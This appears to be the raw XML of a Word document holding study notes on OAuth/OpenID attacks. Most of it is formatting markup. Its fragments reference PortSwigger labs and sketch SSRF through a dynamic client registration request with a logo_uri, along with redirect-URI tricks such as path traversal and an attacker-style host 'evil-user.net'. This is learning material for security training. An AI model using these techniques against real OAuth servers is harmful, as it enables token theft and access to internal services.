          <w:rFonts w:ascii="Roboto Mono" w:cs="Roboto Mono" w:eastAsia="Roboto Mono" w:hAnsi="Roboto Mono"/>
          <w:color w:val="188038"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/.well-known/openid-configuration</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000089">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono" w:cs="Roboto Mono" w:eastAsia="Roboto Mono" w:hAnsi="Roboto Mono"/>
          <w:color w:val="188038"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">check if </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono" w:cs="Roboto Mono" w:eastAsia="Roboto Mono" w:hAnsi="Roboto Mono"/>
          <w:color w:val="188038"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">request_uri_parameter_supported</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">is supported in configuration file</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000008A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">check if registration links are available and logo url can be inserted as shown in next section/lab</w:t>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8"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">dynamic registration: solve </w:t>
      </w:r>
      <w:hyperlink r:id="rId16">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:sz w:val="28"/>
            <w:szCs w:val="28"/>
            <w:highlight w:val="red"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://portswigger.net/web-security/oauth/openid/lab-oauth-ssrf-via-openid-dynamic-client-registration</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:highlight w:val="red"/>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POST /reg HTTP/1.1 Host: oauth-YOUR-OAUTH-SERVER.oauth-server.net Content-Type: application/json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"redirect_uris" : [ "https://example.com" ]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logo_uri:””</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Logo is generally rendered so we can fetch the data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8"/>
          <w:szCs w:val="28"/>
          <w:highlight w:val="red"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono" w:cs="Roboto Mono" w:eastAsia="Roboto Mono" w:hAnsi="Roboto Mono"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:highlight w:val="red"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">https://portswigger.net/web-security/oauth/lab-oauth-stealing-oauth-access-tokens-via-a-proxy-page</w:t>
      </w:r>
    </w:p>
    <w:sectPr>
      <w:headerReference r:id="rId17" w:type="default"/>
      <w:footerReference r:id="rId18" w:type="default"/>
      <w:pgSz w:h="16840" w:w="1190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ourier"/>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07" w:firstLine="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1414" w:hanging="173"/>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2121" w:hanging="173.00000000000023"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Noto Sans Symbols" w:cs="Noto Sans Symbols" w:eastAsia="Noto Sans Symbols" w:hAnsi="Noto Sans Symbols"/>
        <w:b w:val="0"/>
        <w:i w:val="0"/>
        <w:smallCaps w:val="0"/>
        <w:strike w:val="0"/>
        <w:shd w:fill="auto" w:val="clear"/>
        <w:vertAlign w:val="baseline"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="3">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="●"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2828" w:hanging="173"/>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
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3535" w:hanging="173"/>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4242" w:hanging="173"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Noto Sans Symbols" w:cs="Noto Sans Symbols" w:eastAsia="Noto Sans Symbols" w:hAnsi="Noto Sans Symbols"/>
        <w:b w:val="0"/>
        <w:i w:val="0"/>
        <w:smallCaps w:val="0"/>
        <w:strike w:val="0"/>
        <w:shd w:fill="auto" w:val="clear"/>
        <w:vertAlign w:val="baseline"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="6">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="●"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4949" w:hanging="173"/>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
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5656" w:hanging="172.9999999999991"/>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363" w:hanging="173"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Noto Sans Symbols" w:cs="Noto Sans Symbols" w:eastAsia="Noto Sans Symbols" w:hAnsi="Noto Sans Symbols"/>
        <w:b w:val="0"/>
        <w:i w:val="0"/>
        <w:smallCaps w:val="0"/>
        <w:strike w:val="0"/>
        <w:shd w:fill="auto" w:val="clea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1080" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Arimo" w:cs="Arimo" w:eastAsia="Arimo" w:hAnsi="Arimo"/>
        <w:b w:val="0"/>
        <w:i w:val="0"/>
        <w:smallCaps w:val="0"/>
        <w:strike w:val="0"/>
        <w:shd w:fill="auto" w:val="clear"/>
        <w:vertAlign w:val="baseline"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="▪"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Arimo" w:cs="Arimo" w:eastAsia="Arimo" w:hAnsi="Arimo"/>
        <w:b w:val="0"/>
        <w:i w:val="0"/>
        <w:smallCaps w:val="0"/>
        <w:strike w:val="0"/>
        <w:shd w:fill="auto" w:val="clear"/>
        <w:vertAlign w:val="baseline"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="3">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="●"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="180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
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Arimo" w:cs="Arimo" w:eastAsia="Arimo" w:hAnsi="Arimo"/>
        <w:b w:val="0"/>
        <w:i w:val="0"/>
        <w:smallCaps w:val="0"/>
        <w:strike w:val="0"/>
        <w:shd w:fill="auto" w:val="clear"/>
        <w:vertAlign w:val="baseline"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="5">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="▪"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2520" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Arimo" w:cs="Arimo" w:eastAsia="Arimo" w:hAnsi="Arimo"/>
        <w:b w:val="0"/>
        <w:i w:val="0"/>
        <w:smallCaps w:val="0"/>
        <w:strike w:val="0"/>
        <w:shd w:fill="auto" w:val="clear"/>
        <w:vertAlign w:val="baseline"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="6">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
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3240" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Arimo" w:cs="Arimo" w:eastAsia="Arimo" w:hAnsi="Arimo"/>
        <w:b w:val="0"/>
        <w:i w:val="0"/>
        <w:smallCaps w:val="0"/>
        <w:strike w:val="0"/>
        <w:shd w:fill="auto" w:val="clear"/>
        <w:vertAlign w:val="baseline"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="8">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="▪"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3600" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Arimo" w:cs="Arimo" w:eastAsia="Arimo" w:hAnsi="Arimo"/>
        <w:b w:val="0"/>
        <w:i w:val="0"/>
        <w:smallCaps w:val="0"/>
        <w:strike w:val="0"/>
        <w:shd w:fill="auto" w:val="clear"/>
        <w:vertAlign w:val="baseline"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="8">
    <w:lvl w:ilvl="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="●"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="144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180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
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2880" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Arimo" w:cs="Arimo" w:eastAsia="Arimo" w:hAnsi="Arimo"/>
        <w:b w:val="0"/>
        <w:i w:val="0"/>
        <w:smallCaps w:val="0"/>
        <w:strike w:val="0"/>
        <w:shd w:fill="auto" w:val="clear"/>
        <w:vertAlign w:val="baseline"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="5">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="▪"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3240" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Arimo" w:cs="Arimo" w:eastAsia="Arimo" w:hAnsi="Arimo"/>
        <w:b w:val="0"/>
        <w:i w:val="0"/>
        <w:smallCaps w:val="0"/>
        <w:strike w:val="0"/>
        <w:shd w:fill="auto" w:val="clear"/>
        <w:vertAlign w:val="baseline"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="6">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="●"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="360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
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3960" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Arimo" w:cs="Arimo" w:eastAsia="Arimo" w:hAnsi="Arimo"/>
        <w:b w:val="0"/>
        <w:i w:val="0"/>
        <w:smallCaps w:val="0"/>
        <w:strike w:val="0"/>
        <w:shd w:fill="auto" w:val="clear"/>
        <w:vertAlign w:val="baseline"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="8">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="▪"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4320" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Arimo" w:cs="Arimo" w:eastAsia="Arimo" w:hAnsi="Arimo"/>
        <w:b w:val="0"/>
        <w:i w:val="0"/>
        <w:smallCaps w:val="0"/>
        <w:strike w:val="0"/>
        <w:shd w:fill="auto" w:val="clear"/>
        <w:vertAlign w:val="baseline"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="9">
    <w:lvl w:ilvl="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="●"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="216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2520" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Arimo" w:cs="Arimo" w:eastAsia="Arimo" w:hAnsi="Arimo"/>
        <w:b w:val="0"/>
        <w:i w:val="0"/>
        <w:smallCaps w:val="0"/>
        <w:strike w:val="0"/>
        <w:shd w:fill="auto" w:val="clear"/>
        <w:vertAlign w:val="baseline"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="▪"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2880" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Arimo" w:cs="Arimo" w:eastAsia="Arimo" w:hAnsi="Arimo"/>
        <w:b w:val="0"/>
        <w:i w:val="0"/>
        <w:smallCaps w:val="0"/>
        <w:strike w:val="0"/>
        <w:shd w:fill="auto" w:val="clear"/>
        <w:vertAlign w:val="baseline"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="3">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3240" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Helvetica Neue" w:cs="Helvetica Neue" w:eastAsia="Helvetica Neue" w:hAnsi="Helvetica Neue"/>
        <w:b w:val="0"/>
        <w:i w:val="0"/>
        <w:smallCaps w:val="0"/>
        <w:strike w:val="0"/>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320" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Helvetica Neue" w:cs="Helvetica Neue" w:eastAsia="Helvetica Neue" w:hAnsi="Helvetica Neue"/>
        <w:b w:val="0"/>
        <w:i w:val="0"/>
        <w:smallCaps w:val="0"/>
        <w:strike w:val="0"/>
        <w:shd w:fill="auto" w:val="clear"/>
        <w:vertAlign w:val="baseline"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="7">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="◦"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4680" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Arimo" w:cs="Arimo" w:eastAsia="Arimo" w:hAnsi="Arimo"/>
        <w:b w:val="0"/>
        <w:i w:val="0"/>
        <w:smallCaps w:val="0"/>
        <w:strike w:val="0"/>
        <w:shd w:fill="auto" w:val="clear"/>
        <w:vertAlign w:val="baseline"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="8">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="▪"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5040" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Arimo" w:cs="Arimo" w:eastAsia="Arimo" w:hAnsi="Arimo"/>
        <w:b w:val="0"/>
        <w:i w:val="0"/>
        <w:smallCaps w:val="0"/>
        <w:strike w:val="0"/>
        <w:shd w:fill="auto" w:val="clear"/>
        <w:vertAlign w:val="baseli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Heading">
    <w:name w:val="Heading"/>
    <w:next w:val="Body Text"/>
    <w:pPr>
      <w:keepNext w:val="1"/>
      <w:keepLines w:val="0"/>
      <w:pageBreakBefore w:val="0"/>
      <w:widowControl w:val="1"/>
      <w:shd w:color="auto" w:fill="auto" w:val="clear"/>
      <w:suppressAutoHyphens w:val="1"/>
      <w:bidi w:val="0"/>
      <w:spacing w:after="120" w:before="240" w:line="259" w:lineRule="auto"/>
      <w:ind w:left="0" w:right="0" w:firstLine="0"/>
      <w:jc w:val="left"/>
      <w:outlineLvl w:val="0"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:cs="Arial Unicode MS" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman"/>
      <w:b w:val="1"/>
      <w:bCs w:val="1"/>
      <w:i w:val="0"/>
      <w:iCs w:val="0"/>
      <w:caps w:val="0"/>
      <w:smallCaps w:val="0"/>
      <w:strike w:val="0"/>
      <w:dstrike w:val="0"/>
      <w:outline w:val="0"/>
      <w:color w:val="000000"/>
      <w:spacing w:val="0"/>
      <w:kern w:val="0"/>
      <w:position w:val="0"/>
      <w:sz w:val="48"/>
      <w:szCs w:val="48"/>
      <w:u w:color="000000" w:val="none"/>
      <w:shd w:color="auto" w:fill="auto" w:val="nil"/>
      <w:vertAlign w:val="baseline"/>
      <w:lang w:val="it-IT"/>
      <w14:textFill>
        <w14:solidFill>
          <w14:srgbClr w14:val="000000"/>
        </w14:solidFill>
      </w14:textFill>
      <w14:textOutline>
        <w14:noFill/>
      </w14:textOutline>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Body Text">
    <w:name w:val="Body Text"/>
    <w:next w:val="Body Text"/>
    <w:pPr>
      <w:keepNext w:val="0"/>
      <w:keepLines w:val="0"/>
      <w:pageBreakBefore w:val="0"/>
      <w:widowControl w:val="1"/>
      <w:shd w:color="auto" w:fill="auto" w:val="clear"/>
      <w:suppressAutoHyphens w:val="1"/>
      <w:bidi w:val="0"/>
      <w:spacing w:after="140" w:before="0" w:line="276"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paragraph" w:styleId="Body">
    <w:name w:val="Body"/>
    <w:next w:val="Body"/>
    <w:pPr>
      <w:keepNext w:val="0"/>
      <w:keepLines w:val="0"/>
      <w:pageBreakBefore w:val="0"/>
      <w:widowControl w:val="1"/>
      <w:shd w:color="auto" w:fill="auto" w:val="clear"/>
      <w:suppressAutoHyphens w:val="1"/>
      <w:bidi w:val="0"/>
      <w:spacing w:after="160" w:before="0" w:line="259"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14:textOutline>
        <w14:noFill/>
      </w14:textOutline>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="Link">
    <w:name w:val="Link"/>
    <w:rPr>
      <w:outline w:val="0"/>
      <w:color w:val="0563c1"/>
      <w:u w:color="0563c1" w:val="single"/>
      <w14:textFill>
        <w14:solidFill>
          <w14:srgbClr w14:val="0563C1"/>
        </w14:solidFill>
      </w14:textFill>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="Hyperlink.0">
    <w:name w:val="Hyperlink.0"/>
    <w:basedOn w:val="Link"/>
    <w:next w:val="Hyperlink.0"/>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
    </w:rPr>
  </w:style>
  <w:style w:type="numbering" w:styleId="Imported Style 2">
    <w:name w:val="Imported Style 2"/>
    <w:pPr>
      <w:numPr>
        <w:numId w:val="1"/>
      </w:numPr>
    </w:pPr>
  </w:style>
  <w:style w:type="numbering" w:styleId="Imported Style 3">
    <w:name w:val="Imported Style 3"/>
    <w:pPr>
      <w:numPr>
        <w:numId w:val="3"/>
      </w:numPr>
    </w:pPr>
  </w:style>
  <w:style w:type="numbering" w:styleId="Imported Style 4">
    <w:name w:val="Imported Style 4"/>
    <w:pPr>
      <w:numPr>
        <w:numId w:val="5"/>
      </w:numPr>
    </w:pPr>
  </w:style>
  <w:style w:type="numbering" w:styleId="Bullets">
    <w:name w:val="Bullets"/>
    <w:pPr>
      <w:numPr>
        <w:numId w:val="7"/>
      </w:numPr>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:styleId="Hyperlink.1">
    <w:name w:val="Hyperlink.1"/>
    <w:basedOn w:val="Link"/>
    <w:next w:val="Hyperlink.1"/>
    <w:rPr>
      <w:rFonts w:ascii="Arial;Courier;sans-serif" w:cs="Arial;Courier;sans-serif" w:eastAsia="Arial;Courier;sans-serif" w:hAnsi="Arial;Courier;sans-serif"/>
      <w:caps w:val="0"/>
      <w:smallCaps w:val="0"/>
      <w:strike w:val="0"/>
      <w:dstrike w:val="0"/>
      <w:spacing w:val="0"/>
      <w:u w:val="none"/>
    </w:rPr>
  </w:style>
  <w:style w:type="numbering" w:styleId="Imported Style 5">
    <w:name w:val="Imported Style 5"/>
    <w:pPr>
      <w:numPr>
        <w:numId w:val="9"/>
      </w:numPr>
    </w:p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en-US"/>
      <w14:textFill>
        <w14:solidFill>
          <w14:srgbClr w14:val="000000"/>
        </w14:solidFill>
      </w14:textFill>
      <w14:textOutline>
        <w14:noFill/>
      </w14:textOut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localhost.evil-user.net" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image1.png"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://client-app.com/example/path" TargetMode="External"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://client-app.com/oauth/callback/../../example/pa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ortswigger.net/web-security/authentication" TargetMode="External"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://client-app.com/callback&amp;grant_type=authorization_code&amp;code=a1b2c3d4e5f6g7h8" TargetMode="External"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://client-app.com" TargetMode="External"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header1.xml"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://portswigger.net/web-security/oauth/openid/lab-oauth-ssrf-via-openid-dynamic-client-registration"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yperlink" Target="https://www.browserling.com/tools/all-hashes" TargetMode="External"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://md5.gromweb.com/?md5=26323c16d5f4dabff3bb136f2460a943"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NotoSansSymbols-regular.ttf"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/RobotoMon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U9Dkg2zRkfz9eraR0Tj+BwZqmA==">CgMxLjAyCWlkLmdqZGd4czIOaC5oYTVkNjRnaXRxMWQ4AHIhMVhBY214OTV0QVdSenJOTFotY3hsbXEwdG5uSXpiQlZW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